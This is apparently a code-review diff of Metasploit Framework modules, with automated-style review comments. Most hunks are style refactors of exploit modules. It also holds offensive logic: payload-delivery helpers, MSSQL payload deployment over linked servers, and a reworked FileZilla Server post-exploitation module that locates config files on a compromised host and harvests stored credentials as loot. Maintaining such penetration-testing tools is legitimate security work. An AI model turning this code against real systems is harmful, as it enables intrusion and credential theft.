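Review bot: `has_protected_mode_prompt?` spells out two `return false` arms followed by a bare `true`, where a guard plus a single predicate reads more directly: `return false if datastore['ALLOWPROMPT']` and then `!(OperatingSystems::Match::WINDOWS_XP === browser[:os_name])`. The comment above it has "prmopt" for "prompt". Since the decision is a heuristic on the reported OS rather than an actual Protected Mode check, the abort message in on_request_exploit would be easier to diagnose if it named what was detected, e.g. `print_warning("This target (#{browser[:os_name]}) possibly has Protected Mode, exploit aborted.")`.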
@@ -92,10 +136,10 @@ class MetasploitModule < Msf::Exploit::Remote end def vbs_technique(var_shellobj, p) - var_fsobj = rand_text_alpha(rand(5)+5) - var_fsobj_file = rand_text_alpha(rand(5)+5) - var_vbsname = rand_text_alpha(rand(5)+5) - var_writedir = rand_text_alpha(rand(5)+5) + var_fsobj = rand_text_alpha(rand(5)+5) + var_fsobj_file = rand_text_alpha(rand(5)+5) + var_vbsname = rand_text_alpha(rand(5)+5) + var_writedir = rand_text_alpha(rand(5)+5) exe = generate_payload_exe({ :code => p.encoded }) vbs = Msf::Util::EXE.to_exe_vbs(exe) @@ -103,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote # Build the javascript that will be served js_content = %Q| -// + | - return js_content + js_content end def psh_technique(var_shellobj, p) cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first)) js_content = %Q| -// + | - return js_content + js_content end end diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index cdfeba1163..26459acef3 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index b9a6736cdb..aafaccaa1b 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb 
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index 2ff8713b12..865b6b05f8 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote register_evasion_options( [ - OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false']) + OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false]) ]) end @@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote end def generate_space - if datastore['PlaylistSpaceInjection'] == true + if datastore['PlaylistSpaceInjection'] return rand_text(rand(100)+1, nil, " \t") else return '' diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 02656d4b0a..8fe0d02d1d 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -334,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] - if datastore['HTML'] == true + if datastore['HTML'] body = create_email_body_html(datastore['MESSAGE'], msg.subject) content_type = "text/html; charset=\"iso-8859-1\"" msg.add_part(body, content_type, 'quoted-printable') diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 4959c496fb..db56b8840e 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb 
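Review bot: generate_space in winamp_playlist_unc keeps an explicit `return` in both arms of a two-way if after the `== true` cleanup; a conditional expression states the same thing in one line: `datastore['PlaylistSpaceInjection'] ? rand_text(rand(100) + 1, nil, " \t") : ''`. The method's `else`/`end` lines fall outside the hunk.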
+++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index d008307d25..512ca932fd 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index fa349236e9..7dd33fd5e9 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 144a54e9d9..1049ee46b0 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index e0474ff8d1..96e6b9cb59 100644 
--- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index 463ee9ac5b..3eaa4f66bf 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index a04c30b281..90d48de952 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 1efe2accc1..302377f25f 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { 
diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index 498f91f7c3..82e78e7f6c 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 666403ab78..ef37f52edf 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote { 'EXITFUNC' => "none", #'InitialAutoRunScript' => 'migrate -f', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index 4e7f05a02a..a3b275d5b2 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index b8eac69979..c8fc52c28c 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb 
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index 5a6bc720a1..6495b396d2 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => @@ -234,7 +234,7 @@ class MetasploitModule < Msf::Exploit::Remote end =begin -mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c +mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c 1c1 < void *__thiscall CPackage::_GetCurrentIcon(void *this, int a2) --- diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index 5177d24d8a..f2d966c158 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index c45b2fbd7b..0c5fd421fe 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => 
diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 7eb04fa0c4..13c7fdf422 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Payload' => { diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index c9d975e7db..61e4361241 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) end - file = File.join( Msf::Config.data_directory, 'exploits', 'CVE-pending', 'stream.raw') + file = File.join( Msf::Config.data_directory, 'exploits', 'R7_2015_17', 'stream.raw') f = File.new(file, 'rb') stream = Rex::Java::Serialization::Model::Stream.decode(f) diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 98fda64ef1..d548309299 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote "\r\n\r\n" + "\r\nSelect \"DAV:displayname\" from scope()\r\n\r\n\r\n" - if datastore['InvalidSearchRequest'] == true + if datastore['InvalidSearchRequest'] xml = rand_text(rand(1024) + 32) end diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 75282e68fe..f5c11bf244 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb 
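Review bot: The `File.new(file, 'rb')` immediately after the renamed path in hp_sitescope_dns_tool opens the serialized stream with no close visible in the hunk; if `f` is not closed further down (the method continues outside the hunk), the descriptor stays open until the object is collected. The block form closes it as soon as decoding finishes: `stream = File.open(file, 'rb') { |f| Rex::Java::Serialization::Model::Stream.decode(f) }`.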
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local register_options( [ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), - OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']), + OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]), OptString.new('REXENAME', [false, 'Name of exe on remote system']), OptString.new('RTASKNAME', [false, 'Name of task on remote system']), diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index 28433df647..7f7d4d2696 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -35,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'SSL3', 'PrependMigrate' => true }, 'Payload' => diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index ef25e2a7b6..041554ef94 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote { 'EXITFUNC' => 'seh', 'SSL' => true, - 'SSLVersion' => 'SSL3' }, 'Payload' => { diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index b3a7e45813..2b8ed7bd4c 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -38,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Payload' => { 
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index c281adff24..fda5bfcd30 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -377,7 +377,7 @@ exec sp_executesql @z| runme.gsub!(/%STUFF%/, enc) # go! - if (not mssql_login_datastore) + if !mssql_login_datastore fail_with(Failure::NoAccess, "Unable to log in!") end begin @@ -452,7 +452,7 @@ exec sp_executesql @z| return nil end - if (not logged_in) + if !logged_in fail_with(Failure::NoAccess, "Invalid SQL Server credentials") end res = mssql_query("select @@version", datastore['VERBOSE']) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 70d8433c92..f5ad07850b 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', false]), OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), OptString.new('PASSWORD', [true, 'The password for the specified username']) ], self.class) @@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote # Check if credentials are correct print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("Invalid SQL Server credentials") print_status("-------------------------------------------------") return 
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote } if masterList.length == 1 print_good("Successfully connected to #{server["name"]}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(server["name"],parse_results,true) elsif server["db_sysadmin"] == 1 print_good("Sysadmin on #{server["name"]}") @@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote write_to_report(name,server,parse_results,linked_server_table,link_status) # Display link server information in verbose mode - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(name,parse_results) print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") else @@ -219,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] # Display status to user - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] print_status(" ") print_error("Linked Server: #{name} ") print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") @@ -435,14 +435,14 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['DEPLOYLIST']=="" datastore['DEPLOYLIST'] = nil end - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - Checking if #{name} is on the deploy list...") end if datastore['DEPLOYLIST'] != nil deploylist = datastore['DEPLOYLIST'].upcase.split(',') end if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is on the deploy list.") end unless shelled.include?(name) 
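Review bot: The rewritten conditions in the last hunk here now use `.nil?` and `&&`, but the two lines sitting between them, `if datastore['DEPLOYLIST'] != nil` and `if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase`, keep the old `!= nil`/`== nil`/`or` idiom, so the block reads half-converted. Finishing the conversion in place would be `unless datastore['DEPLOYLIST'].nil?` and `if datastore['DEPLOYLIST'].nil? || deploylist.include?(name.upcase)`; the second also removes the low-precedence `or`, harmless in a bare `if` but the same trap the commit's other `and`→`&&` rewrites avoid. The enclosing method starts and ends outside the hunk.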
@@ -451,7 +451,7 @@ class MetasploitModule < Msf::Exploit::Remote else print_status("Payload already deployed on #{name}") end - elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + elsif !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is not on the deploy list") end end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index 3d76870629..7fa63780fa 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote end def check - if (not mssql_login_datastore) + if !mssql_login_datastore vprint_status("Invalid SQL Server credentials") return Exploit::CheckCode::Detected end @@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - if (not mssql_login_datastore) + if !mssql_login_datastore print_status("Invalid SQL Server credentials") return end diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index c94193284d..c9232eafd6 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb @@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Payload' => diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 884221e514..2c926ad6a9 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -80,7 +80,7 @@ module MetasploitModule print_status("Photo saved as #{dest}") - if (datastore['AUTOVIEW'] == true) + if datastore['AUTOVIEW'] print_status("Opening photo in a web browser...") Rex::Compat.open_browser(File.expand_path(dest)) end 
diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index af967b3f6f..0008a53ab7 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -73,6 +73,8 @@ class MetasploitModule < Msf::Post def os_set_wallpaper(file) if session.type =~ /meterpreter/ && session.sys.config.sysinfo['OS'] =~ /darwin/i platform = 'osx' + else + platform = session.platform end case platform when /osx/ diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 1d2b5e94c5..e127602c7c 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb 
@@ -37,36 +37,59 @@ class MetasploitModule < Msf::Post return end - @progs = "#{session.sys.config.getenv('ProgramFiles')}\\" + progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432') + locations = [] + progfiles_env.each do |k, v| + next if v.blank? + locations << v + "\\FileZilla Server\\" + end - filezilla = check_filezilla + keys = [ + "HKLM\\SOFTWARE\\FileZilla Server", + "HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server", + ] + + keys.each do |key| + begin + root_key, base_key = session.sys.registry.splitkey(key) + value = session.sys.registry.query_value_direct(root_key, base_key, "install_dir") + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + next + end + locations << value.data + "\\" + end + + locations = locations.uniq + filezilla = check_filezilla(locations) get_filezilla_creds(filezilla) if filezilla end - def check_filezilla + def check_filezilla(locations) paths = [] - path = @progs + "FileZilla Server\\" - - print_status("Checking for Filezilla Server directory in: #{path}") - begin - session.fs.dir.entries(path) + locations.each do |location| + print_status("Checking for Filezilla Server directory in: #{location}") + begin + session.fs.dir.foreach("#{location}") do |fdir| + ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| + if fdir == xmlfile + filepath = location + xmlfile + print_good("Configuration file found: #{filepath}") + paths << filepath + end + end + end + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + end rescue ::Exception => e print_error(e.to_s) return end - session.fs.dir.foreach(path) do |fdir| - ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| - if fdir == xmlfile - filepath = path + xmlfile - vprint_status("Configuration file found: #{filepath}") - paths << filepath - end - end - end - if !paths.empty? 
print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{session.sid}") print_line @@ -160,7 +183,7 @@ class MetasploitModule < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['ftp_port'], service_name: 'ftp', protocol: 'tcp', @@ -189,7 +212,7 @@ class MetasploitModule < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end perms.each do |perm| @@ -201,13 +224,12 @@ class MetasploitModule < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) # report the goods! - if config['ftp_port'] == "" + if config['admin_pass'] == "" vprint_status("Detected Default Adminstration Settings:") - config['ftp_port'] = "21" else vprint_status("Collected the following configuration details:") service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['admin_port'], service_name: 'filezilla-admin', protocol: 'tcp', @@ -235,7 +257,7 @@ class MetasploitModule < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end vprint_status(" FTP Port: #{config['ftp_port']}") 
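Review bot: In check_filezilla the method-level `rescue ::Exception => e` is left in place even though each location now has its own `rescue Rex::Post::Meterpreter::RequestError` inside the loop; the outer clause still swallows Interrupt and SystemExit and, when it fires, returns nil instead of the paths collected so far. Narrow it to `rescue StandardError => e`, or drop it now that the per-location rescue exists. Two smaller points in the same hunk: `progfiles_env.each do |k, v|` never uses `k`, so `progfiles_env.each_value do |v|` says what is meant, and `session.fs.dir.foreach("#{location}")` interpolates a string into an identical string — `session.fs.dir.foreach(location)`. check_filezilla continues past the end of the hunk.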
@@ -249,31 +271,33 @@ class MetasploitModule < Msf::Post configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'], config['ssl'], config['ssl_certfile'], config['ssl_keypass']] + begin + lastser = parse_interface(fsi_xml) + lastserver << [lastser['ip'], lastser['port'], lastser['password']] + vprint_status("Last Server Information:") + vprint_status(" IP: #{lastser['ip']}") + vprint_status(" Port: #{lastser['port']}") + vprint_status(" Password: #{lastser['password']}") + vprint_line - lastser = parse_interface(fsi_xml) - lastserver << [lastser['ip'], lastser['port'], lastser['password']] - - vprint_status("Last Server Information:") - vprint_status(" IP: #{lastser['ip']}") - vprint_status(" Port: #{lastser['port']}") - vprint_status(" Password: #{lastser['password']}") - vprint_line - - p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, + rescue + vprint_error("Could not parse FileZilla Server Interface.xml") + end + loot_path = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials") - print_status("Credentials saved in: #{p.to_s}") + print_status("Credentials saved in: #{loot_path}") - p = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, + loot_path = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, "filezilla_server_permissions.csv", "FileZilla FTP Server Permissions") - print_status("Permissions saved in: #{p.to_s}") + print_status("Permissions saved in: #{loot_path}") - p = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, + loot_path = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, "filezilla_server_configuration.csv", "FileZilla FTP Server Configuration") - print_status(" Config saved in: #{p.to_s}") + print_status(" Config saved in: 
#{loot_path}") - p = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, + loot_path = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, "filezilla_server_lastserver.csv", "FileZilla FTP Last Server") - print_status(" Last server history: #{p.to_s}") + print_status(" Last server history: #{loot_path}") print_line end @@ -289,16 +313,16 @@ class MetasploitModule < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") end opt = doc.elements.to_a("Settings/Item") if opt[1].nil? # Default value will only have a single line, for admin port - no adminstration settings settings['admin_port'] = opt[0].text rescue "" - settings['ftp_port'] = "" + settings['ftp_port'] = 21 else - settings['ftp_port'] = opt[0].text rescue "" + settings['ftp_port'] = opt[0].text rescue 21 settings['admin_port'] = opt[16].text rescue "" end settings['admin_pass'] = opt[17].text rescue "" 
